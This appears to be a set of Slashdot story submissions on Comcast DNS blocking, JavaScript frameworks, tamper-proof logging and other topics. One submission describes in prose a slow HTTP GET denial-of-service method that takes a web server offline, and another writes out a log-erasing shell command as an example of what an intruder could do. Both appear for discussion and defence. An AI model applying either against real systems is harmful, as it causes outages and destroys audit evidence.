writes "It appears that Comcast is killing BitTorrent use by blocking DNS to BitTorrent users.
For the past week, I've been having issues with my Comcast cable where everything "works fine" except DNS. Even setting up my own caching name server did not work since UDP port 53 was a black hole as far as the public Internet was visible to me. Resetting the modem/router fixed it, only to have the problem reoccur anywhere from a few hours to a day later.
Last Friday I noticed BitTorrent running on my Mac, sharing only a CentOS ISO image, and killed it. I haven't had a problem since. Can anybody corroborate this apparently new tactic being used by Comcast to censor BitTorrent use?"
writes "About a month ago, a story broke that http (apache, IIS and everything else out there) was susceptible to a "slow post", where a malicious client starts a connection to a web server, sends headers indicating a very large upload via POST, and then sends that upload very slowly, starving resources and eventually causing a DDOS.
Well today, doing some research to see how effective this attack was (hint: VERY EFFECTIVE) I tried the same thing using http GET as well, and saw very similar results. With a simple, 20-line PHP script run from my laptop, I was able to take a fairly beefy internal webserver (8 core, 12 GB RAM, CentOS 5) offline in just under a minute, and keep it that way for as long as I wanted to. The technique was simple: send "GET /" and then append letters, 1 or 2 every second or so. After several hundred simultaneous connections were achieved, the web server was no longer responsive. I don't have an IIS server to test against, and don't feel like using any "unwitting volunteers".
It doesn't take a large botnet to take most hosts offline. It takes only a single, relatively low-powered laptop and a 20-line script hacked up in PHP 5.Given that the "slow post" attack is already well known, it's only a matter of time before a black hat discovers that even disabling form post won't protect anybody, either!"
writes "Dear Slashdot,
This is the only way I can think of to actually send a communication to you. I noticed tonight a checkbutton labelled: "As our way of thanking you for your positive contributions to Slashdot, you are eligible to disable advertising."
Well, I'm not going to check it. I've spent years writing my often +modded posts, and have enjoyed doing it! Your adveritising is subtle enough to not detract needlessly from the experience, you get a few pennies from my daily views, and I have purchased more than one item due to an ad posted on Slashdot. It's a win/win/win situation, and I will not be checking the button, nor do I steal content from websites by using products like Adblock. If a website has ads posted intrusively, then I avoid that site, rather than legitimize a website that is offensive in nature by giving it the benefit of my eyeballs.
Thank you Slashdot, for maintaining a high quality, highly relevant site for over 10 years now! I've not paid a thin dime for any of your content, and I have spent countless hours pontificating finer points; you have more than deserved whatever revenue you get from your classy, unobtrusive ad impressions!"
writes "Looks like a pretty serious hole has been found in Linux — affecting 32 and 64 bit versions of Linux with and without SELinux using a creative way to exploit null pointer references. You can check it out yourself. As of this writing, there are no patches available for this, making it a potential zero-day exploit."
writes "For the past 6 years or so, we've been heavily developing a proprietary, custom vertical application based on Linux, Apache, PHP, and PostgreSQL in a home-rolled PHP framework based loosely on Horde. We've been quite successful in the marketplace with our relatively classic technology based on HTML 3.x.
So, which is the best, and why? Which should be avoided? Here are some of the frameworks I've seen so far:
Dojo, Ext JS, Fleejix.js, jQuery, Mochikit, Modello, Mootools, Prototype, Qooxdoo, Rico, and Scriptio. So far, in my research, jQuery and/or Prototype seem to be front runners, Dojo perhaps a close second.
I'd be most interested in the opinions of people who have switched from one to the other, and why?"
writes "I'm revamping our web-based application and am currently reviewing options as far as logging, particularly with redundant, clustered hosting solutions. I've run into a few problems that it seems no amount of online searching seems to have found.
My first concern is about scalability — our application writes directly to local log files. Unfortunately, many of the log entries are quite large and so cannot be piped over syslogd. Other options are much heavier, come with significant administration overhead, or bottlenecks. Is there a syslogd replacement that will allow for very large (tens of KB or larger) log entries?
My next question is about logfile integrity. A perfect log file is write-only, never rewrite. A one-way street, data goes in, gets saved, and never gets deleted. But any log file is essentially just a file, and a single # echo "" > /path/to/log will kill the log file dead. Yes, you can log remotely, but this increases complexity and therefore the chances of failure. Also, what if your remote log server is also compromised? I've been considering the use of a CD-R, especially the ability to recover from a buffer underrun during a write sequence. I've simulated a few, tying up the HDD with I/O while burning a CD-ROM. It under-ran, renegotiated, then resumed writing without incident. Why not use this capability, leave the drive in a sort of permanent under-run, and renegotiate for log entries? Wouldn't doing so create a file that could not effectively be erased, even if the host was compromised?"
writes "Scientology is attempting to stop Anonymous from marching this weekend, Saturday, the 15th by filing a request for a restraining order in what can only be described as the latest development of Scientology vs. The Internet."